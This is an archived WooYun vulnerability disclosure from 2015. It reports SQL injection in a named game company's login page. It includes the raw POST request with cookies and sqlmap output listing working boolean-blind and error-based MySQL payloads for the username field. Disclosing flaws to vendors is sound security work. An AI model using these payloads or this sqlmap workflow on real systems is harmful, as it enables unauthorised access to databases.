乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-29: 细节已通知厂商并且等待厂商处理中 2015-05-29: 厂商已经确认,细节仅向厂商公开 2015-06-08: 细节向核心白帽子及相关领域专家公开 2015-06-18: 细节向普通白帽子公开 2015-06-28: 细节向实习白帽子公开 2015-07-13: 细节向公众公开
【HD】 以团队之名 以个人之荣耀 共建网络安全(由于数据库 以及表内容太多 不可能一一查看 所以随便找了两个库截图 这样不会走小厂商吧?)---------------------------------------------------------------最近几天大家可以留意下吵着要过儿童节的女孩。成年人想过儿童节,心理学上讲,这是一种缓解生活工作压力,排遣孤单寂寞的方式,潜意识里其实是想要有人关怀,甚至是一起制造儿童。你们不要嘲笑,要把握好这个机会。
https://report.ztgame.com/login.html POST注入
POST /do_login.php HTTP/1.1Host: report.ztgame.comConnection: keep-aliveContent-Length: 59Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: https://report.ztgame.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.0.595.32 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: https://report.ztgame.com/login.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: check_cookie_jsztgamecom=123; uniqid=1505291124359537771505; uniqid_a=1505291124359537771505; ref=0; date=2015-05-29+11%3A24%3A35; ref_date=2015-05-29+11%3A24%3A35; ref_ip=42.81.42.133; PHPSESSID=75c9s9867avo4unhsks9ed1se5username=admin&password=admin&code=2680&submit=%CC%E1%BD%BB
保存后 丢进 sqlmap 里
sqlmap identified the following injection points with a total of 272 HTTP(s) requests:---Place: POSTParameter: username Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: username=admin' RLIKE (SELECT (CASE WHEN (6833=6833) THEN 0x61646d696e ELSE 0x28 END)) AND 'VovZ'='VovZ&password=admin&code=2680&submit=%CC%E1%BD%BB Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: username=admin' AND (SELECT 4022 FROM(SELECT COUNT(*),CONCAT(0x7161697471,(SELECT (CASE WHEN (4022=4022) THEN 1 ELSE 0 END)),0x716d677271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wpyi'='wpyi&password=admin&code=2680&submit=%CC%E1%BD%BB---[12:37:20] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.11, PHP 5.4.4back-end DBMS: MySQL 5.0
由于数据库 以及表内容太多 不可能一一查看 所以随便找了两个库截图
危害等级:低
漏洞Rank:2
确认时间:2015-05-29 16:15
内部正在评估
暂无